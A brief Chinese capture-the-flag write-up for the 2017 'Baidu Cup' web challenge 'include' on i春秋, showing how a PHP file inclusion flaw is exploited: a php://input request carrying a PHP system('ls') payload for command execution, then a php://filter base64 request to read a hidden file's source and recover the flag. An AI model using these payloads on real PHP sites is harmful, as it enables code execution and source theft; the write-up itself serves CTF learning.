“百度杯”CTF比赛 2017 二月场

 类型:Web题目名称:include

i春秋 CTF慢慢爬行之路(1)
刚进来只看到一个PHP页面和部分PHP代码,看看提示内容,文件包含漏洞。


不多说,用火狐hackbar直接构造:

?path=php://input

post内容:<?php echo system('ls');?>

会爆出具体有哪些文件。

再通过?path=php://filter/read=convert.base64-encode/resource=dle345aae.php

查看dle345aae.php文件中有些什么东西

i春秋 CTF慢慢爬行之路(1)

得到一个字符串,由后面的“=”可以判断是Base64编码,通过Base64解码就能拿到flag

相关文章:

  • 2022-12-23
  • 2022-01-04
  • 2021-11-09
  • 2021-08-08
  • 2021-11-19
  • 2022-12-23
  • 2021-05-25
  • 2021-08-06
猜你喜欢
  • 2022-12-23
  • 2021-11-29
  • 2022-12-23
  • 2021-08-08
  • 2021-05-27
  • 2021-12-23
  • 2021-12-12
相关资源
相似解决方案